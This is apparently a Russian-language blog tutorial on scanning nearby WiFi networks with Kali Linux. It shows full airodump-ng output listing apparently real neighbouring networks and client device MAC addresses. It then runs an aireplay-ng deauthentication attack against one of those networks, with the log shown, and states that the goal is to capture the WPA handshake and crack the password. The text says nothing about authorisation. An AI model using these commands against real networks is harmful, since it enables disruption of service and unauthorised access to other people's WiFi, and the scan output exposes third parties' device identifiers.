📝 Получаем информацию об окружающих сетях WiFi с помощью инструментов Kali Linux |

📝 Получаем информацию об окружающих сетях WiFi с помощью инструментов Kali Linux

Мануал

Как получить информацию о беспроводных сетях легко с помощью инструментов Kali Linux.

Это очень простой процесс.

📝Как получить доступ к WiFi сети с белым списком MAC-адресов

Используйте эту команду для получения списка всех WiFi сетей вокруг:

sudo airodump-ng wlan0

Вот какой результат мы далее увидим.

Красивый список всех беспроводных сетей в радиусе действия вокруг вас.

CH 13 ][ Elapsed: 6 s ][ 2025-04-21 11:05                                                                                                                  
 
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                            
 
 78:45:58:A0:0F:F8   -1        0        0    0  -1   -1                    <length:  0>                                                                     
 D6:35:1D:DB:03:24  -81        5        1    0  11  260   WPA2 CCMP   PSK  TelstraDB031C                                                                    
 7E:04:A3:0A:E2:0D  -79       14        0    0  11  360   WPA2 CCMP   PSK  Paak                                                                             
 D4:35:1D:1C:0F:C3  -82       13        0    0  11  195   WPA2 CCMP   PSK  Telstra1C0FC3                                                                    
 24:7F:20:6C:5A:40  -85        5        0    0  10  130   WPA2 CCMP   PSK  Telstra6C5A3A                                                                    
 C8:14:51:5F:A9:50  -60       18        2    0   2  130   WPA2 CCMP   PSK  trump                                                                            
 9C:C9:EB:84:E3:05  -90        2        0    0   1  195   WPA2 CCMP   PSK  Telstra1B31                                                                      
 AA:96:09:E2:C6:B0  -87        8        0    0   1   11   WPA2 TKIP   PSK  E_1063_1063                                                                      
 34:6B:46:D0:28:28  -71        9        1    0   1  130   WPA2 CCMP   PSK  OPTUS_D02825                                                                     
 62:22:F3:85:2C:39  -81       15        3    0   2  360   WPA2 CCMP   PSK  Telstra20E859                                                                    
 60:32:B1:F4:BF:2E  -83        5       12    0   6  130   WPA2 CCMP   PSK  USO                                                                              
 D6:92:5E:20:E8:61  -81       14        9    0   6  260   WPA2 CCMP   PSK  Telstra20E859                                                                    
 0A:C7:F5:E5:97:3F  -77       20        0    0   6  260   WPA2 CCMP   PSK  TelstraE59737                                                                    
 
 BSSID              STATION            PWR    Rate    Lost   Frames  Notes  Probes                                                                          
 
 78:45:58:A0:0F:F8  78:45:58:A0:0F:B3  -87    0 -12    457        5                                                                                         
 (not associated)   8C:79:F5:1B:6F:E1  -86    0 - 1      0        1                                                                                         
 (not associated)   DC:97:58:B7:2F:2E  -70    0 - 1     33       23         iPhone                                                                          
 (not associated)   E8:6F:38:5C:16:5A  -83    0 - 1      2        3                                                                                         
 (not associated)   E8:61:7E:48:73:DF  -89    0 - 1      0        1         OPPO A60 5G                                                                     
 34:6B:46:D0:28:28  CC:3F:1D:02:BA:C7  -79    0 - 6      0        1                                                                                         
 34:6B:46:D0:28:28  EE:96:EA:D6:00:0D  -82    0 -11      6        8                                                                                         
Quitting...

Используйте эту команду, чтобы перечислить MAC-адреса в сети.

sudo airodump-ng -c 1 --bssid 34:6B:46:D0:28:28 -w psk wlan0

Это позволяет перечислить все MAC-адреса всех подключенных клиентов в сети WLAN.

🖧 Как фильтровать по MAC-адресу в Wireshark

Это наиболее полезно для получения информации обо всех пользователях в сети Wi-Fi.

С помощью этой информации можно определить, какие устройства используются в сети.

Затем вы можете послать сигнал DEAUTH, чтобы легко выгнать пользователя (пользователей) из беспроводной сети.

sudo aireplay-ng -0 0 -a 34:6B:46:D0:28:28 wlan0
11:34:35  Waiting for beacon frame (BSSID: 34:6B:46:D0:28:28) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
11:34:36  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:37  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:37  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:38  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:38  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:39  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:39  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:39  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:40  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:40  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:41  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:41  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:42  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:42  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:43  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:43  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:44  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:44  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:44  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:45  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:45  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:46  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:46  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:47  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:47  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:48  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:48  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:49  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:49  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:50  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]
11:34:50  Sending DeAuth (code 7) to broadcast -- BSSID: [34:6B:46:D0:28:28]

Для этого требуется режим monitor, поэтому перед использованием этой команды убедитесь, что интерфейс находится в этом режиме.

Но это очень полезно при работе с беспроводной сетью.

🖧 Как отслеживать подключения к сокету с помощью команды ss

Смысл выкидывания пользователей из беспроводной сети заключается в попытке перехватить беспроводное рукопожатие, которое будет содержать PSK, и его можно будет взломать, чтобы получить пароль, хотя пароль может быть любым, и вам понадобится огромный список слов, чтобы взломать современный пароль.

см. также:

 

Пожалуйста, не спамьте и никого не оскорбляйте. Это поле для комментариев, а не спамбокс. Рекламные ссылки не индексируются!
Добавить комментарий